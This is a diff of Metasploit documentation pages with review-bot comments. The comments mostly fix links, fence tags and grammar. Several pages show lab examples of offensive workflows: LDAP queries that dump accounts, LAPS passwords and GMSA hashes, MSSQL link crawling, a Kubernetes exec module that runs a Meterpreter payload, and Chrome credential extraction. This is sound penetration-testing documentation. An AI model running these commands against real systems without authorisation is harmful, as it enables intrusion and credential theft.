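Review bot: the `[[as described here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]]` link loses the `#wiki-ssh` fragment from the old URL, so the sentence about ssh `~/.ssh/config` aliases no longer points at the section that describes them; keep the fragment (or the current heading's anchor) in the target.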
@@ -135,7 +135,7 @@ In this particular case with PR #1217, I did want to send some changes back to t
Here's an example with #6954 (your workflow may vary):
```
$ git checkout upstream/master
$ git checkout upstream/master
Note: checking out 'upstream/master'.
You are in 'detached HEAD' state. You can look around, make experimental
@@ -258,7 +258,7 @@ c = commit -S --edit
m = merge -S --no-ff --edit
````
People with commit rights to rapid7/metasploit-framework will have their [keys listed here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].
# Post-Merge
@@ -291,4 +291,4 @@ If that works, great, you know you don't have any merge conflicts right now.
# Questions and Corrections
Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
@@ -1,6 +1,6 @@
By default test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:
```
```msf
msf6 > loadpath test/modules
Loaded 38 modules:
14 auxiliary modules
@@ -9,4 +9,4 @@ Loaded 38 modules:
msf6 >
```
These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
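Review bot: the rewritten paragraph still reads `assuming it is has been signed off`; drop the stray `is`. `let one of the Metasploit team members know this` also reads better as `let one of the Metasploit team members know`.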
@@ -1,6 +1,6 @@
Metasploit Framework 5.0 has released!
Metasploit Framework 5.0 has released!
Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.
Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.
See the release announcement [here](https://blog.rapid7.com/2019/01/10/metasploit-framework-5-0-released).
@@ -12,7 +12,7 @@ The following is a high-level overview of Metasploit 5.0's features and capabili
* A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.
* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [[here|./Metasploit-Web-Service.md]].
* Adds `evasion` module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules [here](https://www.rapid7.com/info/encapsulating-antivirus-av-evasion-techniques-in-metasploit-framework). Rapid7's first evasion modules are [here](https://github.com/rapid7/metasploit-framework/pull/10759).
@@ -28,6 +28,6 @@ The following is a high-level overview of Metasploit 5.0's features and capabili
You can get Metasploit 5.0 by checking out the [5.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/5.0.0) in the Metasploit GitHub project.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://docs.metasploit.com/), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
See all the ways to stay informed and get involved at <https://metasploit.com>.
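Review bot: the link now points at https://docs.metasploit.com/ but the link text still says `our wiki here`, and the same sentence later says `if you can't find something you want in our wiki`; update both to refer to the documentation site so the prose matches the new target.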
@@ -22,7 +22,7 @@ Metasploit 6 adds support for SMB client connections using the version 3 dialect
While many modules were updated to use the RubySMB SMB 3 implementation, not all were updated. Notably many older exploits that pre-date the release of SMB 3 were not updated and continue to use the original Rex implementation of the protocol. For those modules that have been updated however, users will be able to use them without any changes to their work flow. By default the newest dialect will be negotiated with the remote server and if it is one of the dialects within version 3 that supports encryption, the framework will use encryption by default. Users can alter this behavior by setting the `SMB::AlwaysEncrypt` and `SMB::ProtocolVersion` options. `SMB::AlwaysEncrypt` enforces encryption for SMB 3 connections even when the server does not require it (defaults to: `true`) while `SMB::ProtocolVersion` is a comma separated list of versions to allow the framework to negotiate (default: `1,2,3`).
Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [Guidelines for Writing Modules with SMB](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Writing-Modules-with-SMB).
Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [[Guidelines for Writing Modules with SMB|./Guidelines-for-Writing-Modules-with-SMB.md]].
## Pull Requests
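Review bot: the rewritten sentence keeps `For information on writing modules target SMB for Metasploit`; it should read `writing modules that target SMB` (or `targeting SMB`).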
@@ -48,6 +48,6 @@ A complete list of pull requests included as part of the initial version 6 work:
You can get Metasploit 6.0 by checking out the [6.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/6.0.0) in the Metasploit GitHub project.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://docs.metasploit.com/), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.
See all the ways to stay informed and get involved at <https://metasploit.com>.
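Review bot: as on the 5.0 page, the link text `our wiki here` and the later `in our wiki` no longer match the https://docs.metasploit.com/ target; reword both to `our documentation`.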
@@ -25,14 +25,14 @@ The current data storage mechanism couples the metasploit core framework code to
* The ability to support/use different data storage technologies is difficult
* Promotes a monolithic architecture where poor performance in any segment of the software affects the entire system (large network scans)
Our solution to this is a data service proxy. A data service proxy allows us to separate core metasploit framework code from the underlying data service technology. The `framework.db` reference to data services is no longer tied directly to the underlying data storage, but instead all calls are proxied to an underlying implementation.
Our solution to this is a data service proxy. A data service proxy allows us to separate core Metasploit Framework code from the underlying data service technology. The `framework.db` reference to data services is no longer tied directly to the underlying data storage, but instead all calls are proxied to an underlying implementation.
Currently we plan to support the legacy data storage technology stack (RAILS/PostgreSQL) which we hope to eventually phase out. The new implementation will use a RESTful (https://en.wikipedia.org/wiki/Representational_state_transfer) approach whereby calls to `framework.db` can be proxied to a remote web service that supports the same data service API. We have built a web service that runs atop the current data storage service for the community.
This approach enables us to:
* More easily enhance the metasploit data model
* Run a web-based data service independent of the metasploit framework
* Reduces the memory used by a metasploit framework instance using a data service by no longer requiring a DB client
* More easily enhance the Metasploit data model
* Run a web-based data service independent of the Metasploit Framework
* Reduces the memory used by a Metasploit Framework instance using a data service by no longer requiring a DB client
* Increases throughput as storage calls don't necessarily need to be asynchronous
* Allow teams to collaborate easily by connecting to a centralized data service
* Quickly build out data services that leverage different technology stacks
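Review bot: the rewritten list mixes verb forms: `More easily enhance`, `Run`, then `Reduces`, `Increases`, then `Allow`, `Quickly build`. Since the `Reduces the memory used` bullet is already being edited for capitalisation, change it to `Reduce` (and `Increases throughput` in the context line to `Increase`) so the list is parallel.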
@@ -41,4 +41,4 @@ This approach enables us to:
## Usage
For more information on setting up the web service and using the data services see [Metasploit Web Service](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
For more information on setting up the web service and using the data services see [[Metasploit Web Service|./Metasploit-Web-Service.md]].
@@ -1,22 +1,22 @@
## What is msfdb?
msfdb is a script included with all installations of Metasploit that allows you to easily setup and control both a database and a Web Service capable of connecting this database with Metasploit.
While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database).
While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database).
## Why should I use msfdb?
It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database.
It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database.
The Metasploit features that require a connected database include:
* Recording other machines on a network that are found with a nmap scan via the `db_nmap` command are stored as "Hosts".
* Hosts can be viewed with the `hosts` command
* Storing credentials successfully extracted by exploits are stored as "creds".
* Storing credentials successfully extracted by exploits are stored as "creds".
* Credentials are viewed with the `creds` command.
* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".
* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".
* Successful exploitations can be viewed with the `vulns` command.
* The `vulns` command also tracks unsuccessful exploitation attempts
* The `vulns` command also tracks unsuccessful exploitation attempts
* Storing services detected on remote hosts by `db_nmap` are recorded as "Services"
* Remote services are viewed with the `services` command
* Tracking multiple remote sessions opened by exploit payloads
* Tracking multiple remote sessions opened by exploit payloads
* These sessions can be managed and tracked with the `sessions` command.
* Storing any difficult to define information returned by successful exploits as "Loot"
* Viewable with the `loot` command
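Review bot: this hunk is whitespace-only (every changed line is identical to the line before it), but the bullet list it touches has grammar that should be fixed in the same pass. `Recording other machines on a network that are found with a nmap scan via the `db_nmap` command are stored as "Hosts".`, `Storing credentials successfully extracted by exploits are stored as "creds".` and `Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".` each pair a gerund subject with "are stored/recorded"; suggest `Hosts found with an nmap scan via the `db_nmap` command are stored as "Hosts".` and the same shape for the creds and vulns bullets. The sub-bullet `The `vulns` command also tracks unsuccessful exploitation attempts` also contradicts its parent, which says only successful attempts are recorded; say in the parent bullet that both outcomes are recorded.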
@@ -62,7 +62,7 @@ Generating SSL key and certificate for MSF web service
Attempting to start MSF web service...success
MSF web service started and online
Creating MSF web service user your_current_account_name
############################################################
## MSF Web Service Credentials ##
## ##
@@ -77,15 +77,15 @@ MSF web service user API token: super_secret_api_token
MSF web service configuration complete
The web service has been configured as your default data service in msfconsole with the name "local-https-data-service"
If needed, manually reconnect to the data service in msfconsole using the command:
db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443
The username and password are credentials for the API account:
https://localhost:5443/api/v1/auth/account
```
Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed:
Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed:
```
MSF web service username: your_current_account_name
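Review bot: the reconnect command `db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443` passes `--skip-verify` with no explanation. Add a sentence that the certificate is the self-signed one `msfdb init` generated (`Generating SSL key and certificate for MSF web service` earlier in the same output) for a loopback service, and that `--skip-verify` should not be carried over to a data service reached over the network. Also `The Username, Password, and API token used to connect to the Web Service is displayed:` needs `are displayed`.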
@@ -93,7 +93,7 @@ MSF web service password: super_secret_password
MSF web service user API token: super_secret_api_token
```
Followed by instructions on how to connect to your database with Metasploit via the Web Service:
Followed by instructions on how to connect to your database with Metasploit via the Web Service:
```
If needed, manually reconnect to the data service in msfconsole using the command:
@@ -109,23 +109,23 @@ https://localhost:5443/api/v1/auth/account
All this information is loaded by Metasploit automatically at startup from the ~/.msf4 folder. You should copy the credentials to a file in case you need them in the future. If you forget or lose the credentials but you can always run `./msfdb reinit` and reset the Web Service authentication details. **Just make sure to say no to the prompt asking you if you want to delete the Database contents!**
## msfdb commands
## msfdb commands
The commands for msfdb are as follows:
* `./msfdb init` Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice.
* `./msfdb delete` Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.
* `./msfdb init` Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice.
* `./msfdb delete` Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.
* `./msfdb reinit` The same as running `./msfdb delete` followed immediately by `./msfdb init`.
* `./msfdb status` Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed.
* `./msfdb status` Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed.
* `./msfdb start` Start the database & web service.
* `./msfdb stop` Stop the database & web service.
* `./msfdb stop` Stop the database & web service.
* `./msfdb restart` The same as running `./msfdb stop` followed immediately by `./msfdb start`.
## msfdb errors
In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose).
In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose).
## What's next?
That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [[here|./Metasploit-Web-Service.md]].
If you want to get started hacking but don't know how to, here are a few guides we really like:
* [The easiest metasploit guide you'll ever read](https://www.exploit-db.com/docs/english/44040-the-easiest-metasploit-guide-you%E2%80%99ll-ever-read.pdf) - A great, easy to follow guide on how to set up Metasploit and Metasploitable (Our intentionally vulnerable Linux virtual machine used to for security training) for VMs. Also has a fantastic guide on penetration testing Metasploitable 2, from information gathering right up to exploitation.
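Review bot: `If you forget or lose the credentials but you can always run `./msfdb reinit`` has a stray `but`; suggest `If you forget or lose the credentials, you can always run`. The advice `You should copy the credentials to a file in case you need them in the future.` tells the reader to put an API token in a plaintext file; since the same paragraph says the values are loaded from `~/.msf4` and that `./msfdb reinit` can reset them, either drop the sentence or recommend a password manager instead. Smaller nits in this hunk: `a value of the users choice` should be `user's`, and `used to for security training` should be `used for security training`.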
@@ -10,7 +10,7 @@ Note that any port can be used to run an application which communicates via HTTP
This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance:
```
```msf
msf6 > search tomcat http
```
@@ -48,7 +48,7 @@ run http://example.com HttpTrace=true verbose=true
For instance:
```
```msf
msf6 > use scanner/http/title
msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
@@ -8,7 +8,7 @@ a compromised docker container, or external to the cluster if the required APIs
In the future there may be more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search kubernetes
```
@@ -40,7 +40,7 @@ run session=-1
If the Kubernetes API is publicly accessible and you have a JWT Token:
```
```msf
msf6 > use cloud/kubernetes/enum_kubernetes
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
RHOST => https://kubernetes.docker.internal:6443
@@ -67,7 +67,7 @@ Namespaces
By default the `run` command will enumerate all resources available, but you can also specify which actions you would like to perform:
```
```msf
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions
Auxiliary actions:
@@ -114,7 +114,7 @@ The `exploit/multi/kubernetes/exec` module will attempt to create a new pod in t
If you have a Meterpreter session on a compromised Kubernetes container with the available permissions, the module values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT` module options
will be gathered from the session host automatically. The `TOKEN` will be read from the mounted `/run/secrets/kubernetes.io/serviceaccount/token` file if available:
```
```msf
msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
TARGET => Interactive WebSocket
msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
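Review bot: the prose above the fence says `RHOSTS` is gathered from the session, but the command sets `RHOST=""`; use one option name so readers know which value to clear. The command also blanks `RHOST`, `RPORT` and `POD` without saying why; add that the empty values make the module take them from the session rather than from a value left over from an earlier run. `the module values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT` module options` repeats `module`; suggest `the `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT` options`.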
@@ -136,7 +136,7 @@ pwd
If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the `thinkphp-67f7c88cc9-tgpfh` pod:
```
```msf
msf6 > use exploit/multi/kubernetes/exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
@@ -0,0 +1,128 @@
## LDAP Workflows
Lightweight Directory Access Protocol (LDAP) is a method for obtaining distributed directory information from a service.
For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc.
LDAP on Windows environments are found on:
- 389/TCP - LDAP
- 636/TCP - LDAPS
- 3268 - Global Catalog LDAP
- 3269 - Global Catalog LDAPS
### Lab Environment
LDAP support is enabled by default on a Windows environment when you install Active Directory.
For LDAPS support to be enabled on port 636, you will have to configure [[AD CS (Active Directory Certificate Services)|ad-certificates/overview.md]]
### Authentication
The LDAP module supports the following forms of authentication with the `LDAP::Auth` option:
- auto
- ntlm
- kerberos - Example below
- plaintext
- none
### LDAP Enumeration
The `auxiliary/gather/ldap_query.rb` module can be used for querying LDAP:
```
use auxiliary/gather/ldap_query
run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
```
Example output:
```msf
msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
[*] Running module against 192.168.123.13
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
CN=Administrator CN=Users DC=domain DC=local
==========================================
Name Attributes
---- ----------
badpwdcount 0
description Built-in account for administering the computer/domain
lastlogoff 1601-01-01 00:00:00 UTC
lastlogon 2023-01-23 11:02:49 UTC
logoncount 159
memberof CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local |
| CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm
inistrators,CN=Builtin,DC=domain,DC=local
name Administrator
objectsid S-1-5-21-3402587289-1488798532-3618296993-500
pwdlastset 133189448681297271
samaccountname Administrator
useraccountcontrol 512
... etc ...
```
This module has a selection of inbuilt queries which can be configured via the `action` setting to make enumeration easier:
- `ENUM_ACCOUNTS` - Dump info about all known user accounts in the domain.
- `ENUM_AD_CS_CAS` - Enumerate AD CS certificate authorities.
- `ENUM_AD_CS_CERT_TEMPLATES` - Enumerate AD CS certificate templates.
- `ENUM_ADMIN_OBJECTS` - Dump info about all objects with protected ACLs (i.e highly privileged objects).
- `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
- `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
- `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
- `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
- `ENUM_DOMAIN` - Dump info about the Active Directory domain.
- `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
- `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
- `ENUM_EXCHANGE_SERVERS` - Dump info about all known Exchange servers.
- `ENUM_GMSA_HASHES` - Dump info about GMSAs and their password hashes if available.
- `ENUM_GROUPS` - Dump info about all known groups in the LDAP environment.
- `ENUM_GROUP_POLICY_OBJECTS` - Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.
- `ENUM_HOSTNAMES` - Dump info about all known hostnames in the LDAP environment.
- `ENUM_LAPS_PASSWORDS` - Dump info about computers that have LAPS enabled, and passwords for them if available.
- `ENUM_LDAP_SERVER_METADATA` - Dump metadata about the setup of the domain.
- `ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
- `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
- `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
- `ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
- `ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
- `ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
- `ENUM_USER_PASSWORD_NEVER_EXPIRES` - Dump info about all users whose password never expires.
- `ENUM_USER_PASSWORD_NOT_REQUIRED` - Dump info about all users whose password never expires and whose account is still enabled.
- `ENUM_USER_SPNS_KERBEROAST` - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting.
### Kerberos Authentication
Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
Query LDAP for accounts:
```msf
msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13
[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
CN=Administrator CN=Users DC=domain DC=local
============================================
Name Attributes
---- ----------
badpwdcount 0
pwdlastset 133184302034979121
samaccountname Administrator
useraccountcontrol 512
... etc ...
```
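Review bot: `ENUM_USER_PASSWORD_NOT_REQUIRED - Dump info about all users whose password never expires and whose account is still enabled.` repeats the `ENUM_USER_PASSWORD_NEVER_EXPIRES` description; the action name suggests it enumerates accounts with the password-not-required (`PASSWD_NOTREQD`) flag set, which is a different and more serious misconfiguration, so please check the module's own description and correct the text. In the same file: `3268 - Global Catalog LDAP` and `3269 - Global Catalog LDAPS` lack the `/TCP` the first two entries carry; `The `auxiliary/gather/ldap_query.rb` module` should drop `.rb` to match the `use auxiliary/gather/ldap_query` line under it; `LDAP on Windows environments are found on:` should be `is found on`; typos `contrained`, `uncontrained` and `This isneeded - as without`. In the Kerberos example the command authenticates with `domain=demo.local` and `ldap::rhostname=dc3.demo.local`, but the captured output reports `Discovered base DN: DC=domain,DC=local`, so the output comes from a different lab than the command; regenerate one of them so they agree.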
@@ -0,0 +1,61 @@
## MSSQL Workflows
Microsoft SQL Server (MSSQL) is a relational database management system. Commonly used in conjunction with web applications
and other software that need to persist data. MSSQL is a useful target for data extraction and code execution.
MySQL is frequently found on port on the following ports:
- 1433/TCP
- 1434/UDP
### Lab Environment
Environment setup:
- Either follow [Microsoft's SQL Server installation guide](https://learn.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver16) or use chocolatey package manager
- Enable TCP access within the SQL Server Configuration Manager
- Optional: [Microsoft's sqlcmd utility](https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver16) can be installed separately for querying the database from your host machine
- Optional: [Configure Windows firewall](https://learn.microsoft.com/en-us/sql/sql-server/install/configure-the-windows-firewall-to-allow-sql-server-access?view=sql-server-ver16) to allow MSSQL server access
### MSSQL Enumeration
### Running queries
```
use auxiliary/admin/mssql/mssql_sql
run rhost=192.168.123.13 username=administrator password=p4$$w0rd sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
```
### Link crawling
Identify if the SQL server has been configured with trusted links, which allows running queries on other MSSQL instances:
```
use windows/mssql/mssql_linkcrawler
run rhost=192.168.123.13 username=administrator password=p4$$w0rd
```
### Kerberos Authentication
Details on the Kerberos specific option names are documented in [[Kerberos Service Authentication|kerberos/service_authentication]]
Connect to a Microsoft SQL Server instance and run a query:
```msf
msf6 > use auxiliary/admin/mssql/mssql_sql
msf6 auxiliary(admin/mssql/mssql_sql) > run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid'
[*] Reloading module...
[*] Running module against 192.168.123.13
[*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response
[+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response
[*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin
[*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid
[*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193)
auth_scheme
-----------
KERBEROS
[*] Auxiliary module execution completed
```
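Review bot: `MySQL is frequently found on port on the following ports:` names the wrong product and doubles `port`; this is the MSSQL page, so `MSSQL is commonly found on the following ports:`. `### MSSQL Enumeration` is an empty heading immediately followed by `### Running queries`; either nest the query and link-crawling sections under it or remove it. `Identify if the SQL server has been configured with trusted links` would be clearer using the product's own term, linked servers, which is what `mssql_linkcrawler` follows. The Kerberos transcript includes `[*] Reloading module...`, a development-session artefact that should be removed from the sample output.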
@@ -13,7 +13,7 @@ Metasploit has support for multiple MySQL modules, including:
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search mysql
```
@@ -6,7 +6,7 @@ Metasploit post modules replace old Meterpreter scripts, which are no longer mai
You can search for post gather modules within msfconsole:
```
```msf
msf6 > search type:post platform:windows name:gather
Matching Modules
@@ -25,7 +25,7 @@ There are two ways to launch a Post module, both require an existing session.
Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
```
```msf
msf6 > use post/windows/gather/enum_chrome
msf6 post(windows/gather/enum_chrome) > run session=-1 verbose=true
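Review bot: `comand` in the unchanged context line `Within a msf prompt you can use the `use` comand followed by the `run` command` is a typo; fix it (and `a msf` to `an msf`) while the fence on the same paragraph is being changed.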
@@ -49,7 +49,7 @@ msf6 post(windows/gather/enum_chrome) >
Or within a Meterpreter prompt use the `run` command, which will automatically set the module's session value:
```
```msf
msf6 > sessions --interact -1
[*] Starting interaction with 5...
@@ -13,7 +13,7 @@ Metasploit has support for multiple PostgreSQL modules, including:
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search postgres
```
@@ -97,7 +97,7 @@ psql postgres://postgres:mysecretpassword@localhost:5432
Metasploit's output will be:
```
```msf
msf6 auxiliary(server/capture/postgresql) >
[*] Started service listener on 0.0.0.0:5432
[*] Server started.
@@ -23,7 +23,7 @@ Metasploit has support for multiple SMB modules, including:
There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:
```
```msf
msf6 > search mysql
```
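Review bot: `msf6 > search mysql` under the SMB module list is a copy-paste from the MySQL page; the search term here should be `smb`, otherwise the fence-tag change ships a command that lists the wrong modules.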
@@ -185,3 +185,30 @@ use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:p4$$w0rd@192.168.123.13/my_share/remote_file.txt lpath=./local_file.txt
```
### Kerberos Authentication
